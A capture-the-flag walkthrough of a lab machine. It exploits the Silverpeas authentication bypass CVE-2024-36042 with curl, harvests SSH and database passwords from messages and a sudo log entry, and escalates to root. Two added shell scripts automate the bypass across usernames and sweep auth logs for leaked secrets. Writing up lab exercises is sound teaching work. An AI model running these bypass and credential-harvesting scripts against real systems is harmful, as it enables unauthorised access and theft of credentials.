
Silver Platter

Target Discovery

We begin by identifying open ports on the target machine. -p- covers all 65535 TCP ports, -Pn skips host discovery and treats the host as up, and --min-rate 5000 trades stealth for speed, which is acceptable in a lab.

export TARGET_IP=10.10.198.176
nmap -p- -Pn --min-rate 5000 $TARGET_IP

Nmap Scan Results (8080 is labelled http-proxy purely from the port number; it turns out to be a web application):

Not shown: 65381 closed tcp ports (reset), 151 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy

Initial Enumeration

Browsing http://10.10.198.176/#contact, we find a note:

"If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is scr1ptkiddy."

Navigating to http://10.10.198.176:8080/silverpeas/defaultLogin.jsp, we find a login page for Silverpeas.

Exploiting Silverpeas Authentication Bypass (CVE-2024-36042)

A quick search shows that Silverpeas Core before 6.3.5 (that is, up to 6.3.4) is vulnerable to a trivial authentication bypass, CVE-2024-36042: if the POST to AuthenticationServlet omits the Password parameter altogether, the server authenticates the request as whatever user is named in Login. No credential is needed, only a valid username, and the contact note on port 80 has just handed us one.

Exploitation

We send the login form as scr1ptkiddy with no Password parameter at all:

curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=scr1ptkiddy&DomainId=0"

Response (the 302 together with a freshly issued JSESSIONID means the login was accepted):

HTTP/1.1 302 Found
Set-Cookie: JSESSIONID=XG8ol2dO2luwA5gzNHbDp4jtMig7y6vQn86wTy6S.ebabc79c6d2a; path=/silverpeas; HttpOnly

Gaining Access

Copy the JSESSIONID value from the response and set it in your browser's cookies (Storage Tab -> Cookies -> Modify JSESSIONID), or keep using curl with a cookie jar.

Now, accessing http://10.10.198.176:8080/silverpeas/look/jsp/MainFrame.jsp, we discover two more users: Administrateur and Manager.
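The bypass, the cookie handling and the MainFrame.jsp check above can be scripted so that every username we collect is tried in one go. The following script is an added example and is not part of the original writeup: it builds the base URL from TARGET_IP as set earlier, uses DomainId=0 as the page does, and assumes (unverified) that MainFrame.jsp answers 200 to an authenticated session and redirects otherwise.

```shell
#!/bin/sh
# Added example (not from the original writeup): script CVE-2024-36042 with
# curl, keep each session in a cookie jar, and confirm it against MainFrame.jsp.
# Assumptions: default domain (DomainId=0) and TARGET_IP as exported earlier.

BASE="http://${TARGET_IP:-10.10.198.176}:8080"

# Read raw HTTP response headers on stdin and print the JSESSIONID value.
# Prints nothing and returns 1 if the server issued no session cookie.
extract_jsessionid() {
    sid=$(tr -d '\r' | sed -n 's/^[Ss]et-[Cc]ookie: *JSESSIONID=\([^;]*\).*/\1/p' | head -n 1)
    [ -n "$sid" ] || return 1
    printf '%s\n' "$sid"
}

# POST the login form with no Password parameter and store cookies in $jar.
# On a vulnerable build the server answers 302 and sets JSESSIONID.
silverpeas_bypass() {
    user="$1"; jar="$2"
    curl -s -i -c "$jar" -X POST "$BASE/silverpeas/AuthenticationServlet" \
         --data-urlencode "Login=$user" --data-urlencode "DomainId=0" \
      | extract_jsessionid
}

# Reuse the jar and print the status code MainFrame.jsp returns. Assumption:
# 200 for a logged-in session, a redirect to the login page otherwise.
check_session() {
    jar="$1"
    curl -s -o /dev/null -w '%{http_code}' -b "$jar" \
         "$BASE/silverpeas/look/jsp/MainFrame.jsp"
}

# Network part only runs when invoked as: sh bypass.sh run
if [ "${1:-}" = "run" ]; then
    for u in scr1ptkiddy Manager Administrateur; do
        jar="/tmp/silverpeas_$u.jar"
        if sid=$(silverpeas_bypass "$u" "$jar"); then
            printf '%-16s JSESSIONID=%s  MainFrame -> HTTP %s\n' \
                   "$u" "$sid" "$(check_session "$jar")"
        else
            printf '%-16s bypass failed (no session cookie)\n' "$u"
        fi
    done
fi
```

Each jar can then be passed to any later curl with -b, which is quicker than pasting cookies into the browser when you are hopping between accounts.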

Escalating Privileges

Using the same authentication bypass technique, we attempt login as Manager:

curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=Manager&DomainId=0"

Inside the account, we find a message:

"Dude, how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes."

Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

SSH Access as tim

We use the credentials to access the system via SSH:

ssh tim@10.10.198.176
# Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

Verifying user privileges. The adm group matters: on Ubuntu the logs under /var/log, auth.log included, are owned by root:adm, so tim can read them without sudo:

id
# uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)

Privilege Escalation

Inspecting the authentication logs. sudo records every invocation here, full command line included, and the rotated copies (auth.log.1, auth.log.2, ...) are worth reading as well as the current file:

less /var/log/auth.log.2

In auth.log.2 we find tyler's sudo invocation of docker run. The database credentials were passed as -e environment variables on the command line, so sudo logged them verbatim. The entry is cut off here; note also that -p 8080:8000 is why Silverpeas sits on host port 8080:

Dec 13 15:45:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/op
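Reading one rotated file by hand worked here, but the general move is to sweep every auth log for sudo COMMAND entries that carry a credential. The script below is an added example, not part of the original writeup; the match patterns are a starting point, and the sample lines in the demo function are constructed with an invented secret, not copied from the target.

```shell
#!/bin/sh
# Added example, not from the original writeup: sweep the auth logs for sudo
# COMMAND entries that carry a credential on the command line. The patterns
# and the constructed sample lines below are illustrative assumptions.

LOGDIR="${LOGDIR:-/var/log}"

# Read syslog-style lines on stdin; print "user:command" for every sudo
# COMMAND line whose command contains a password-like token: an environment
# assignment such as DB_PASSWORD=..., a --password flag, or a mysql-style
# " -pSecret". The last pattern is deliberately loose and needs triage.
find_sudo_secrets() {
    grep -E 'sudo:.*COMMAND=.*(PASS(WORD|WD)?=|--password[= ]| -p[^ -])' \
      | sed -E 's/^.*sudo: +([^ ]+) : .*COMMAND=(.*)$/\1:\2/'
}

# Walk auth.log and its rotated copies (plain or gzipped), prefixing each
# hit with the file it came from. Reading them needs the adm group or root.
sweep_auth_logs() {
    for f in "$LOGDIR"/auth.log "$LOGDIR"/auth.log.[0-9]*; do
        [ -r "$f" ] || continue
        case "$f" in
            *.gz) zcat "$f" ;;
            *)    cat "$f" ;;
        esac | find_sudo_secrets | sed "s|^|$f:|"
    done
}

# Offline check on constructed log lines (same shape as the real entries,
# secret value invented): only the docker line should come back.
demo_on_constructed_lines() {
    printf '%s\n' \
      'Dec 13 15:45:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -e DB_PASSWORD=Example-Secret-1 -d silverpeas' \
      'Dec 13 15:46:01 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/apt update' \
      'Dec 13 15:47:10 silver-platter sshd[1234]: Accepted password for tim from 10.0.0.5 port 5555 ssh2' \
      | find_sudo_secrets
}
```

Run sweep_auth_logs as tim to cover every rotated file at once; demo_on_constructed_lines shows the expected shape of a hit without touching the box. The same sweep is useful from the defensive side: anything it returns is a secret that should be moved into an env file or a secrets store and rotated.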

SSH Access as tyler

Using the extracted password. It is nominally the database password, but on this box it is also tyler's login password, so credential reuse is worth trying whenever a secret turns up:

ssh tyler@10.10.198.176
# Password: _Zd_zx7N823/

Checking user privileges:

id
# uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

Root Privilege Escalation

Checking sudo privileges. tyler is in both sudo and lxd; lxd membership alone would be a second route to root via a privileged container, but sudo is the simpler path:

sudo -l
# (ALL : ALL) ALL

Since tyler may run any command as any user via sudo, we escalate to root:

sudo su
id
# uid=0(root) gid=0(root) groups=0(root)